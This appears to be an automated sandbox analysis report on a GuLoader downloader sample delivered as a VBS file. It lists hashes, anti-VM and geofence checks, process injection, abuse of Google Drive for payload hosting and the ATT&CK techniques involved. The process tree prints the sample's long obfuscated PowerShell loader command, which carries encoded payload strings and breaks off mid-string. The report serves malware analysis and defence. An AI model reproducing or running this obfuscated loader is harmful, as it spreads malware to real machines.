guloader | 8c00c454e6ad4bd1f3da75c64bbfbec9e5d1c60f8d1261d3416092a5286244b7

Analysis

max time kernel
142s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/12/2024, 12:00 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JULSA 2210229506A.vbs
Size

733KB
MD5

aec804daef54d95f792c3f15412535ea
SHA1

caefec8e0f73270559edbf714fbb703f100a02b1
SHA256

eb2a3f6ebe19514c6f1f7795eb65b4e3d2c0584ad754b06ad89ce6b4d247770f
SHA512

8c6420299ded52dfad338ed391ae16b13b1ac8bcb8f9482fc99e6916a9b8ae3c8dd7eadb8076d8770172369526f6ba11f87f94d72d779d7d157e7818136f3a5f
SSDEEP

12288:UoC/EqeqN8AmHXmXt7QUu38zUL9ZaYTTr8DDdSfLmXe3l6GLOYv0Z:PCHGXm97zvUL9LOg6O3YYvy

Score

10^/10

guloader discovery downloader execution

Malware Config

Signatures

Guloader family
guloader
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	3080	WScript.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
748	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	drive.google.com
21	drive.google.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
748	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
748	powershell.exe
2644	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 748 set thread context of 2644	748	powershell.exe	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	caspol.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
748	powershell.exe
748	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
748	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	748	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 3080 wrote to memory of 748	3080	WScript.exe	86
PID 3080 wrote to memory of 748	3080	WScript.exe	86
PID 3080 wrote to memory of 748	3080	WScript.exe	86
PID 748 wrote to memory of 2644	748	powershell.exe	93
PID 748 wrote to memory of 2644	748	powershell.exe	93
PID 748 wrote to memory of 2644	748	powershell.exe	93
PID 748 wrote to memory of 2644	748	powershell.exe	93

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JULSA 2210229506A.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3080
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Vitriolate = """SwiFBryuHybnTracStstRemiprooVannDry BogHBanTShwBUpr Daa{Sum Sto Edi Wea TrspFriaLgdrSteaMarmHve(Tip[AnsSOpvtAfgrStiibaanUdsgRad]Chi`$AndHSorSVil)Arc;Ska mus Ste Kun Cor`$ForBNeeyRadtEmmeBaysArc Phi=Bre VriNConeRabwInd-OveOOxybErgjUntesatcFlatDer AanbIllySuptKloeHen[Her]Exc Sur(Wax`$FamHPerSPen.NonLMiceKlonKongChrtAfthOri Vin/Pro Bln2Agh)afs;Sir Era Tur Air ManFLaaoIndrSte(Ple`$UnpiSte=Gar0Doc;Woo Pre`$troiMan Ter-GyllAfktReg Udd`$FleHHjeSMod.SpeLCameBronEnogUnatCirhTip;Dis For`$suziHos+Bil=Kro2sni)Dan{Ash sti Bla Ama Bib Ado Int Bil Eks`$saxBUndyreptTuteSopsSme[Par`$Fifigla/Fin2Woa]Con unh=Coc Swa[LiqcRigoFilnSelvUaneelerUnrtJen]Lib:Pre:kolTAnioUniBvenyHentBolePyl(Tou`$ArmHEncSDef.glaSTeruTribAsksvictEffrStiitranSingRov(Rak`$FatiMod,Abs Sta2Ind)For,Pet ros1Cys6Mal)Non;Swi Tan Flo`$BetBurbySactRefeViosmet[Pri`$BediLap/Eks2Gar]Dis Scu=Ang Sja(Jas`$OptBSomyPottTraeSkasTv [Put`$cypiDet/Man2Ste]Ska kal-LumbStuxEleoHanrFor Lns6Und9Pyn)Erm;rem Bes Sla Mos Dis}int Acc[StySMentStarGrniArbnHovgRec]Dat[CirSEnkyPrisSkatHypeIdemlyk.JenTFejeSyzxdsbtChi.NytEUnsnUnpcKauoSkedUnciBronNongRin]Mem:Inc:GasALeaScohCRitIPocISan.HjeGOspeBedtSteSHastgimrAndiHarnCilgEtt(Uds`$PycbBacyPsetBineUpssAnd)Teo;Gra}Rho`$MytPMaxrDigoStecReseSinsPresAgeiUnmoAsinSrveShanUns0Pas=TitHPreTbedBAhm Kin'Kvg1exo6Smi3SubCKap3Sls6Kon3Des1Cre2Spe0Tea2Gri8Knl6relBSem2Kam1Car2Deu9Inc2gte9Fla'Mul;Non`$SexPNatrArtoLoncInceGlasNotsSkiiExtoFranCroeIndnSky1Non=HobHOrdTKobBunc Eum'Udd0Spe8Ter2BrnCDis2App6mon3Lan7Eti2AllAUng3Arb6Fal2MedALub2Kra3Sig3Sup1res6BurBFed1Mis2Tri2stiCLin2EksBFej7Kon6Bed7Lan7Var6MinBSka1And0Itz2SimBflb3Typ6Tre2Lan4Beh2Der3Lin2Bde0Ira0dagBTok2Kla4Kon3Bro1die2SdeCRam3Pal3Des2Pyr0flo0You8Ana2Uni0For3Udr1Car2habDRon2ComACor2Sal1Hal3Pai6Rel'Hex;Cla`$ImpPOudrKarowencsnaeFetsSvasForivaeoKolnFugeSpanPla2Usa=SkoHPunTFacBGen Shi'Sle0Pos2Lys2Inf0Den3Sec1lis1Pri5Gru3Cer7Fla2RinAUrt2Pro6Sub0Suk4Uns2Bra1Reh2bef1Dig3Pil7Fni2Hyr0Urm3Fou6Ivo3Lit6aku'Knu;ubr`$RenPBesrCarobulcAnoeMonsDrisSamiSupoEmbnlufeLonnMis3Hom=DefHDefTTanBfor Syg'dio1dob6Ful3ukaCCam3Una6Fol3Bal1Set2Aga0Unm2Ild8pau6DemBHor1Kom7Ska3Isr0jeh2YngBMbu3cem1Tan2UnwCAng2Pet8Med2Rel0Afs6MagBHar0SavCSte2WanBsko3Loa1Maa2Tek0Sky3App7Til2CouAKal3ove5Mic1Sta6Cae2Noc0Ens3sto7Opg3Mis3Spa2CelCTon2Pet6Ove2Ref0Pro3Str6Peu6SidBUnd0AriDCyc2Med4Tan2ResBSto2His1Wor2Uti9Mes2Eks0pop1Gua7Saf2Skr0Sli2Con3Bru'Rea;Sph`$proPPlerRenoOvecToleCaysMatsEmaiQuaoFinnBoreBannUds4Syv=TorHIllTEpiBCom Str'Nor3Rox6Spa3Ant1Agg3Hyp7Att2LakCBes2preBFyl2Hom2Udl'Sal;Des`$ExoPColrBesoThecBsseDissTubsCriiConoClanTriePernGau5Fri=UnrHUnoTInsBBel Nom'Ser0eft2Bel2Inu0Fag3Tra1pet0san8Peb2SubASam2Dia1Non3Per0Rad2Cot9Thr2Kno0Mid0PolDFor2pla4Tro2ModBLyd2Gum1Dig2Kor9Ast2Tod0Bio'Lar;Vok`$TetPFarrStooLeicTrneMassVrdsRegiWoooSconforePasnUre6Zoo=MarHSceTTouBuse For'Pri1Lan7Gla1acc1nut1Kit6Amo3Pro5Des2Vit0Rut2tek6Ent2HelCCur2Rob4Avi2For9Pre0SkaBUnc2red4Jom2Bar8met2Ove0rol6Fre9Jde6Inc5Gen0EleDPic2SygCRin2Nar1Fej2Buc0Cri0Cyc7Blo3KonCUdd1For6Pla2GteCSkj2Ost2Kas6Sno9Ing6Non5van1Har5Luf3Str0Haa2Pro7kri2Unc9Mic2SecCIdi2Kom6Typ'Bli;Ach`$PsePkosrFreoFixcEnteGrosligsRetiSpioFodnBlieMoynOst7Upl=AppHArbTPanBHer mfd'Spe1Flu7Dag3Skr0Rub2ResBEdd3Kal1Hol2PamCNun2Tre8Ald2Pir0Tro6Van9sid6Riv5rbe0hae8Mid2Car4Ele2KleBChr2bnd4Tel2mun2Bro2Het0Cho2smm1Dur'Vok;Bib`$RefPMaprAfkoMoscUndeNonsBygsFebipaaoUfunVeseBalnTra8Poi=sclHTitTAnsBCha Tut'unf1Gri7Gra2Uns0Tre2dir3Jac2Fin9Ent2Trl0Int2Gil6Ski3Inc1Cen2Slg0Ske2Kil1Ber0Rel1Uma2Bog0Num2Bor9Sto2Aff0Tes2Ant2Ter2Loc4Amo3Mas1Opp2Mid0and'Ami;For`$PrePBanrGrioRencChreSkusScisbriiKvloRysnDageInsnHaa9Mon=DemHOveTStnBFol Ele'Eja0AltCTim2MetBMag0Oxy8Opm2Agi0Ano2Kit8Neu2afsAHyd3Cab7Sce3OboCMaj0Rem8Tro2IndADis2Gru1Sac3Ele0Men2Orn9Sig2Bel0Ove'Enk;The`$GriNtrauStrlLitlhydiTrapOpdeMejnIncnSteeAvesPre0Cou=BarHGroTBluBUnp Tel'Ree0Asp8Jou3GemCPle0Cor1Gob2Suf0Ops2Rdv9Eks2Bri0Tar2Ele2tap2Kon4Cro3Sta1Mou2Dis0fod1pal1Sgn3AfsCSka3Dek5Bol2Cip0Reg'Sem;Mag`$UdlNprouOmklDiglFloiIlepEndeStanInqnElweamasHep1Jab=KlvHTutTSalBsub Omr'Gra0Und6Hed2Hen9Foo2Aft4Kro3obd6Ind3Wig6bro6For9Chr6Ref5Los1Hyp5han3For0Afk2Nyk7Cen2lam9Agl2KamCFlo2Imp6Fer6Thy9Car6Hem5Ulv1tar6Pam2Mid0Mer2Sor4Med2Unr9The2Vac0Unh2Ops1Mom6Spe9sut6nif5Rep0Ret4Toh2CarBhid3Pla6Til2PenCAlu0Ren6Ken2Uds9Lic2Tpi4Rea3Ani6Lis3Mun6Ans6Stu9Ped6Aut5Beh0Pho4Bri3Dag0Uds3Paa1Soa2UniAPel0Par6Fir2Ark9sil2Thy4For3Fgt6cho3Hom6Sek'Gge;Bli`$PreNSlauSkylMeilPreiReapDiseMacnWoonUdreFigsCac2Sku=BilHFjeTBliBSie Bom'Afm0KomCTym2AntBUnh3Rec3Ove2PsyAPne2ojiEBif2for0Nam'Udl;doe`$FieNBaruGuelplilFriiStapIsbeRelnBernBokeGeysHel3Tip=PreHFlsTtraBAmb Ove'Cle1Ela5Tim3Gre0Man2Sar7Rid2Cer9Kra2FilCMic2Ben6Sub6Elb9Afl6Arb5Fli0ForDPha2EukCDen2Toy1Rac2yen0Dep0Veg7Com3EndCTer1Zoo6Bry2UtrCSem2Mop2Ine6Sme9Coo6Dis5Fae0KliBPra2Kom0Ene3Fin2Kvg1Gun6Mul2sak9Ove2OpdAHug3Sky1Sve6Abs9Aba6Irr5Oct1Van3Eng2ErkCLav3Rej7Can3Sol1Brs3App0Sus2Fon4Nym2Stj9Syn'Gon;Opi`$ParNPrvuFlelBirlJomiGenpBileKonnFoontrseRenssph4Han=IndHPolTPulBSug Con'Ene1Gen3Tub2LisCKor3Rad7Lai3Afm1Bry3Clo0Fal2Fin4Unc2Ene9ste0Say4Adr2Man9Dem2Fra9Svi2JouAAqu2Mia6Sla'Pro;Hav`$PerNneduLinlNatlIntiLufpSekeGnanMitnDrieFirsPan5For=SogHRegTIllBKno Fli'Tra2AntBSum3Cal1Int2dac1Nds2Acq9khe2Aut9For'Imm;Sin`$FlaNRomuSoflDiplFuniSdepBrneUnwnMatnPlaeDecsAfg6Mod=HanHudbTUnpBFor Kla'Dot0DelBAlp3Dre1Bel1Pro5Udp3Tum7rve2OpfATal3Pho1Sub2Pro0Cet2Gra6Fan3Ank1Bes1Lab3Hvi2OprCUbe3Bas7Ans3Rej1Spe3Fib0Sla2Sko4Ama2Pla9Rul0Min8Ken2Har0Vri2And8tes2BrnADia3Ten7Pen3DetCFre'Ind;Vip`$HenNPesuUfolAnklDraiUsdpNoneArcnMelnvadeDecsMon7Sia=ExpHLabTRasBHaa ove'Bla0EngCErh0Pol0Oli1HusDDia'Hal;Unt`$HalNStruArrlTrslJaniNegpPaseBesnSobnAfleAgasWhi8Ske=GraHMatTPanBPar Paa'Gal1Com9pos'Sta;FalSScoeAprtPie-SlaAMatlSpeiOffaThusads Abu-UnfntolaWagmSlieund EtcNOctuHanlFlylSepiReapPleeFodnFiknUegeRaasPhe9Aal Und-resvFriaJudlVriuSteeOve Bru`$smiNBrouThrlBdelOphiMispAareNarnLabnKakeUndsAnt7Rad;BryfTanuQuanSamcMemtOmaiPlkoBalnAll HygfmaakallpKon Spk{skoPBlyaSilrCadaUdrmHyp Tol(Ver`$LegvAmp_BatmBal,dol Uni`$EthvChi_YobpPok)Sil Con Fur Kor Reg Mon;swo`$SinSSarkDisoStrlTasiAbsnIntgInd2Elo3sun7Mic0Sem Ldd=UnpHReiTJorBBad Adh'Gau6Med1Unp3Nee3sti3Tim0dvi2ModBRen2Qui8Sge6Rig5Bes7Amp8Und6Wel5sti6ectDChu1setEUng0Can4Geo3Rei5Rep3Ron5Und0Piu1Gri2CidAPea2Boe8Gru2Ign4Aur2tabCSei2DruBFou1Ser8Unf7StaFUds7SnrFOrg0Giv6Ege3Isc0Dog3Fre7Eug3Pse7Hoo2Con0Und2FemBInc3Dro1Mes0Gun1For2scoASer2cre8Glo2Pre4Vaa2UniCDel2KroBHis6ChaBReg0Skr2Hyp2Pru0Cus3Nja1Oct0Ref4Zoo3Bra6Kra3vem6Sub2Fje0Per2Exu8afb2Mel7Fal2Ngl9Dup2XylCBes2Con0Ult3sci6Pam6ForDLun6UndCKle6Sto5Ska3For9Var6Non5her1syv2Eri2SkaDTas2Sko0Ghe3Fun7Pim2Uro0Chr6Ska8Ste0SpiAInt2Mng7Van2LavFGui2Usu0Alm2Sni6Can3Paa1Fin6Ski5Bje3ApiEBaa6sov5Pas6Rea1Yil1FusASko6ThiBRev0Sys2Cal2Fan9Hep2ForAPos2Lin7Djv2Ann4Men2Att9Kys0Fla4Bre3Svi6Unr3Ove6Suk2cra0Bid2Col8Nak2Rin7Jen2Sav9Udd3BeaCGal0Swa6lyn2Sta4Arc2Tas6Har2DuvDala2Pre0Del6Ser5Ska6Eft8Gra0Luc4Skl2UslBSpl2Mis1Slv6Sky5Ved6Fdr1Lfa1BliAklo6SydBUdv0Spi9Maa2PreAUnd2Sma6imp2Reg4Pne3Ans1syl2NydCDed2SleAFre2SocBEle6AfbBsyr1Gly6Afs3Tre5Ano2Cog9tvi2SneCGun3Bef1Unt6PreDMen6Kog1Sky0BorBsap3Eks0Col2Eur9Huk2cha9Bla2PreCTun3Too5She2Del0bri2conBFut2SorBFir2Kon0Fjo3ent6Pro7SteDInd6GurCove1FarESol6Til8Skr7Ans4mal1Sor8Alg6ChaBChi0Gen0Gha3Ost4Dis3Ant0Ego2Haw4Leg2Ops9Kur3Eff6Mar6MerDFor6Drm1Ono1Paa5udm3Syv7Sha2StoAunc2Und6dan2Str0Dun3Uro6Mer3Reh6Gig2KreCSch2DagAAre2FeaBTjr2Auk0Jam2AttBCur7Ful5Hav6MynCRin6Ind5Spr3Eff8Beh6PinCOmn6tsaBBls0Mel2Dvr2Tro0Bip3Tha1Kid1Rud1Des3OreCBed3Mim5Seq2Fri0Ord6OrmDPre6Van1Pri1Bor5Sup3Coo7Unc2TilAFip2Nan6Hel2Cyn0Dan3Unp6Jen3Ind6Fol2PseCHen2WorAPar2MarBCor2Lam0Rol2UnvBEvi7Fre4Ind6PezCWar'Bre;EpiNOmsuBanlSkrlLunikonpFaceUndnNetnPareSycsSix9Naz Egn`$UncSBankKaloRealSceiDipnBevgIod2umu3Pho7Str0Vul;hen`$SpaSReokPlaoChiloveiTvrnDaggGra2Hve3Pol7Coc5Uar Ver=hjr GraHIntTEduBUni Eup'Rul6Mis1Mac3She3Ref2Var4Out3Mag7Spo1ChrATol2Und2Nfa3Nic5Aph2Aar4Ano6Pat5Bli7Udt8Mon6Mik5Inc6Sar1Til3sti3Nab3Fis0Dob2TryBLan2Sup8Fat6FurBMas0Aff2Ops2Nap0Wip3mis1Uhe0Bog8Sma2Fac0Edw3Tpp1Kir2UnsDUnh2IniAPar2raj1Uns6HypDGaa6Und1Opr1Hau5Afb3Tro7Ord2freAMov2War6Ser2Nas0Opf3Uns6Sin3Gau6Inc2NonCtob2ButAApp2SupBTen2pla0Bog2claBPro7Bot7Int6Dri9Bar6Sub5Jay1AcoEJer1pun1dgn3QuaCsuc3Gge5Por2Fla0Ned1norEVir1Uni8Abh1Dan8Cab6Ser5Sho0Vin5Slb6OrdDAds6Unm1Non1Bes5Sit3Jem7Rec2RodAUne2Tex6Cir2Mod0Jap3Neb6Met3Ult6Sta2proCCer2PlaASpa2AtoBCar2Bez0Cer2palBPos7Lit6Ace6Rot9Bal6for5Udb6Rid1Sup1Niv5Pik3Eva7Eng2KnyARub2Fur6Sky2spl0Jar3Dau6For3Wad6Cor2NedCStr2VagAAcc2SamBIns2Sam0kom2SlaBSpe7Sor1Ten6OveCTil6CanCDep'com;BetNMuxuMejlOutlSchiTwepMineSminGrunBareNinsSpl9Afs Mus`$AvaSAntkForoSunlObviFornFlogSay2Pse3Kir7Non5Mye;Gan`$SmoSConkBocoFillEddiMisnNumgBev2Wes3Cor7For1bld kon=Ung StaHTomTRaaBKon Lin'Out3Auk7Avl2Uni0Cat3Str1Ohm3Bom0Gyn3Arm7geo2KriBFrk6Enj5Pir6Gro1Rav3Pol3Bro2taa4Bet3Sha7Tra1TroAPia2Gal2Par3Bet5Opt2Mar4Bor6RosBAas0UdsCFlo2MasBHai3Lib3Sko2BurATar2ForESup2Ers0Chi6NonDDua6Spi1Rso2kraBPup3Oms0Imp2Skr9Opt2Til9Bel6For9Myt6Imp5Eje0Acc5Pri6IngDaut1SmaEAvi1Jos6sjl3skjCove3Esr6Rme3Sej1atr2Laa0fol2Qua8Rei6SrpBNon1Pel7tro3Neg0Imp2EpaBdis3Mis1Ate2alaCBlo2Str8Ind2All0Ski6LigBChi0papCDec2TabBDie3Lig1Ecu2Bog0Rea3Con7Vae2DumAExc3Bag5Bro1Non6Cor2Maj0Omg3Bra7Ate3Man3Ove2MagCPro2For6Oes2Mis0Unt3Ant6Mas6OtoBUnl0HamDBoo2Pro4Ste2TheBShu2Udh1Byg2Syn9red2Doe0Mal1Aug7Dat2Nas0Mus2Fig3kys1Ava8Too6CykDUpc0kliBfle2Hoo0Onl3Res2Und6Kon8Afh0SquAAfk2Org7Fal2UdpFRen2Pre0Dek2Ass6Fra3Int1Dob6ate5Umr1sal6Dun3WuzCNer3Fri6Enr3Udv1Ven2Sus0Ego2Kse8Bru6SorBInd1Mac7Neu3Kri0Ems2AmeBHyp3Giv1Kbe2FokCSom2Sve8Ful2Plu0Sno6ComBLiv0AdvCShi2BreBBez3Pro1Vio2Spi0pla3bas7Sni2AvoAAfm3Ect5San1Pho6Svi2Hoa0Kls3rei7Til3Tor3ter2culCOpr2For6Pra2Und0Sca3Bet6Lig6BreBAfp0SbeDIod2Sti4Bam2RasBTyk2Beg1For2Att9ski2Arb0Woo1Rdb7sil2Hip0Sku2Sam3San6IndDNon6FodDLit0empBPla2Afr0Ers3ove2tho6bal8Bor0BisAfro2Con7Gia2TanFShi2uds0Ban2Tom6Kon3Duc1Fla6ant5Spi0BioCNdr2BekBEks3Cla1Lot1soa5Rad3Fir1San3Sup7Bid6RidCHuc6Lnf9Hjl6Ink5Bli6IrrDAnt6Fat1Sve3Tru3Aer3Ind0Fal2NorBAkt2Ank8Agi6BehBThi0Kom2Bou2Kon0Str3For1Sig0Sto8Mas2Gar0pel3Ens1Che2WolDLef2FibARem2Lyt1Tap6SlgDJen6Tra1Eft1Ben5Fol3Ufu7Acu2LivAUnf2Vaa6Cas2Con0Exp3Uri6Daa3Cus6unv2MyeCScu2LivAtri2UbeBFin2Sky0ind2ObsBSmo7hyp0gui6MccCsad6AvoCbuz6KviBBim0OceCHov2tilBPro3Fyr3Sel2PapAAkt2gynESie2Met0Unc6AlbDOpv6Pen1Dyn2SouBFyl3Kom0Cha2kno9Dep2Rib9fot6Mod9Uns6Pur5Mas0Tri5Eft6TriDKlb6Phi1pro3Prc3Ulk1BlaAMns2Snu8Zin6TreCUnp6AllCAtt6helCAnk6SolCWin6vit9Dis6Lyd5Nin6Apr1pil3Rim3Col1DhaAmok3Fes5Hub6metCBeh6UnvCBon'Bek;IncNSubuShelUnllBiciTeapMoueAnnnBulnDipeFjesPsa9Bun Byg`$gliSReskExcoNeklArciStinVacgMon2Rak3lov7Jag1Ana;alf}DrefAmauSemnVolcfejtwreiZadoOrnnWin ResGUndDBahTUnd Bog{SchPWurahalrProaDaemAfs Cha(Lit[DgnPpiraRebrUnaaCirmMiseRectPaaeTierAsp(ChaPDiioKw sRotiHeltPatiLiloUldnWal Dia=Yer Mou0Sal,Str ObsMBesaSkrnBlydKuraSvatRegoUnhrChaySoc Bej=Tet Bly`$IntTPanrFlguNateExu)Aci]Sko Ing[SkyTAmayForpCepeant[Uti]Unw]Tri Kla`$SprvRotaMelrVal_HurpLobaAdrrdowaSynmTvieLaxtGodenonrSamsAgg,Laz[AirPUdsaTumrSpraWismniterustComeKahrIng(BerPTiloBansSnaiUnstMskigoboStinKle Gol=Lde Fic1Kra)all]Bes Dow[UnrTAveyTelpPoteFro]Not Smi`$AldvOparSkutStj Clo=Tol Hah[mglVAceoUnmiCaedMoi]Haa)Unr;Bor`$RemSLitkVesoImplBveiChenRepgRim2Tel3Pre7Car2dis Pho=God IntHBudTTriBChi Bed'Sto6Ges1Egl1gau3Tog1Spi1Non0Sac7Und6Dis5Cra7Ski8Ska6Nee5Lym1FldESor0Kon4War3Dam5Nit3Gou5Unm0Aud1Udl2SakABee2Str8Sam2Jah4Pie2ImmCAna2MarBSid1Mrk8Lin7indFLan7GaiFRim0Nyt6Suc3Brn0Han3Fer7Oto3Kri7hel2Str0Ove2HunBInt3Plo1Gra0Pre1Sem2CocAMau2Mrk8for2Kam4Ste2StvCPal2WolBUnw6StiBDic0Non1Bah2Bre0Del2Mam3typ2PheCCui2FloBKse2Tra0Ben0non1Brn3EnlCNon2KetBTri2Shi4Snk2Kor8Ser2BruCMah2Ref6Wor0Lde4Sne3Brn6Tea3Hyd6Gov2Ant0Par2Gni8neu2Sym7Dri2Sbe9Hyg3parCsel6BukDayu6UntDBun0SunBHea2rug0Rot3Lit2Man6Lan8Inf0PalAAsp2Eth7Hrd2RaiFper2Hvi0Sto2ski6Emb3Skr1Urt6Dkv5Blo1Aca6Mas3InsCLas3Frf6Hau3Fla1Tab2Kro0For2Int8ove6MetBLov1Alb7Sme2Ano0Reg2Log3Dif2Bet9Ass2Udv0Dic2Byz6Frg3Skr1Int2ForCUnc2SupASto2EarBLvo6PelBBar0sat4Nur3Str6Bro3Vag6gen2Fla0Imm2Ses8Oxy2Tra7Sar2For9Rad3RodCRei0EmbBegh2Sed4Ngl2Int8Ast2Haa0Mur6RubDBro6Win1sik1Deb5fje3Duv7Gen2CamACop2Sex6Kur2Gas0Kal3Dec6Irr3Inc6Ele2WalCMou2BaaAAfs2ForBind2Boi0Tje2BefBUdr7BejDFor6EroCSto6MarCSur6Uns9Kla6Car5bil1AntEEva1Sho6emm3NegCDis3Luf6Fol3Jok1Dyn2eth0Lag2Fre8Per6HelBNob1Typ7ind2Fas0Gai2Tud3Udf2Gal9Ref2Ham0Bru2Inc6exc3Sem1Beg2AdvCrub2UvaALeg2RepBEth6ArbBDia0Nav0Kon2Mes8Rad2undCMic3Toa1Dis6AmpBOsp0Str4Dyn3Bec6Hae3Pom6Fri2Dis0Rid2Fly8Sto2Obv7Fru2Ang9Rer3SldCSto0Nat7Con3For0Rus2TjrCGor2Lge9ord2Beh1Pla2Tou0Bib3Ker7pug0Con4Nri2Bac6Was2Ege6Omp2Bel0Sam3Rap6Pro3Afs6Rec1Kim8Con7SolFSam7BogFKaj1Pas7Liv3Fer0Fla2SubBDrn6SamCRua6bueBSar0Adg1Obe2Sag0Lak2Afr3Fro2bilCdem2WroBUnh2Pyt0Fra0Apo1Lni3AgtCAvo2QuaBRen2Sta4Unp2Jon8kro2UnfCHor2Sma6ink0Irr8skk2TreASko2Nat1Kar3And0eng2Lys9Kaf2Dre0Aar6PreDNih6mis1Ant1Tog5Dyp3Non7Uns2pleAAnn2Ent6Ush2spa0Bur3Eva6Kom3Aer6erh2AnnCOst2ThaAZes2AppBHel2Wil0Sik2GlaBHin7SemCTom6Til9Sup6Dos5Beg6for1Gan2uge3Han2Unn4Res2Lir9Uku3Mic6Tra2Tep0Qua6UdmCAct6SvaBLok0Syd1Spe2Blo0Ret2Des3Pig2NivCDro2SkiBtra2Mye0Cog1Ska1Non3zooCTob3Res5Fai2Ant0Kon6renDRum6Far1Emf0MaaBBas3Trv0Pen2Cav9Lsr2Man9sin2NonCAll3Wan5Res2Dra0Ver2StrBJus2KvkBRet2Tel0Act3Sku6For7Cal5Udb6Spi9Tid6Mus5Yaw6Car1Bes0ShaBUre3Usv0Ind2Bel9Afs2Dec9Lre2LaeCFoe3Aze5Afv2Kld0Mac2UnwBKee2NyeBVar2Min0Pre3Dre6Ref7Unb4Svk6Tom9Boo6Oto5Kok1KonEEks1Ina6eta3OzoCHyb3Bro6Twi3Run1Mul2God0Pho2tyv8Phy6MyeBDob0Ose8Mac3Ala0Mac2Pye9Jar3Cas1Kun2IntCSce2Soc6Kon2Pro4Gea3Ove6Gas3tre1Ind0Fel1Dag2Vks0Pro2tor9Equ2She0Hus2Pli2Ver2Sla4Cru3ufa1Arc2Ang0Kon1Spi8Unt6AcrCBal'Pri;CanNInduBenlLanlGuiiKnapPraeEmbnBudnWraeArtsfar9Tie Tal`$RagSBokkInvoNanlSkeiFornGragBri2Cet3Aad7sna2Fer;Sky`$DupSLitkzonoDeilPariParnCuagBru2Sol3Hjs7Str3Rab Sha=Euk SmeHStiTTimBQun Sco'Asc6Tol1Kal1Dep3syv1Mye1Rad0Tab7out6MisBPro0Vir1ove2Pan0Exp2Spi3Sne2bliCSol2SpaBInd2Uds0aut0Gar6Dis2DisARac2ZooBSym3ken6Ind3Atl1Suf3Spl7und3Drn0prv2scr6Epo3kon1Kon2SleAFir3esp7Ell6ComDHjr6Bif1Dom1Exc5Gri3Sag7For2MaaAFor2Out6For2Flu0Man3wot6Sav3lit6Udl2ArbCNig2RefAFug2YdeBFer2Tal0flo2MetBAfn7Reb3Hon6Unw9Cla6Gte5Bra1ObdERes1Bun6Pap3NymCAfm3Tit6Tot3Nsk1Pra2Hug0Ver2Red8Fej6belBOut1Dif7Kol2Gla0Pok2Unm3App2Int9Pig2bes0Opa2Ver6Fib3Con1Bud2StoCnyo2ChuAWay2BadBKap6MolBThi0Spe6End2Fre4Kor2Rev9Ter2Coc9Ulo2OpsCNon2AflBCas2Til2Eve0Fog6izv2MauAKos2FatBTro3Bra3Bog2sto0Sim2AmaBVol3Reg1Pot2AftCSlu2EftAKan2IntBPfa3Sip6Til1Tri8Com7GenFVan7SkrFTar1Mak6Spi3Afl1Mod2Ass4Bra2OmvBSyv2Avi1Imd2win4Iq 3Cra7Skr2sha1Ign6Cam9Ast6Bli5Shi6Fre1For3Sju3Sve2Ori4Ban3suc7Sor1PuzAPos3Ind5Fis2Ulv4Has3Hyp7Zam2Dek4Che2Dre8Pla2Bar0Tib3Gle1opp2Uno0Tra3Bol7Kro3van6Dos6NonCPri6OveBTar1Pos6Kog2exc0Vac3Sup1Ret0RegCBan2Unw8ins3Tin5Syn2Ato9Drm2Ini0Met2Tre8Lan2thi0Fab2FalBTra3Liv1Kom2Hel4Ove3Eps1aar2HypCInt2EleABog2FetBHav0Ste3Bet2Ado9Uns2Lre4amt2Bnd2Cro3Brn6Val6IntDRet6Del1nab1Gra5Hus3Imp7Ttn2PlaAPoi2Wal6Aks2Uda0Ind3fas6Anl3Sta6Dum2TilCSel2AchASla2ArcBHje2Ver0Und2EndBTat7Fer2Lil6BokCsek'Sto;ChaNmiluSollSeilHusiOripSileFavnDacnHypeOctsbil9ove Kva`$MagSCamkSoaoArclKoriArcnDrigmin2Tra3She7Reo3Ami;Ant`$LseSTrakStooFrrlUdhiDyknColgRav2Enc3Ing7Cla4Til Sek=Ind NonHFlyTAnsBStn Pre'Dis6Bru1Str1Vej3Ib 1Amy1Var0Dem7Ngt6MowBCat0mas1Opr2Ref0Pan2Cow3Deh2StuCPar2SkiBCha2blu0emi0D 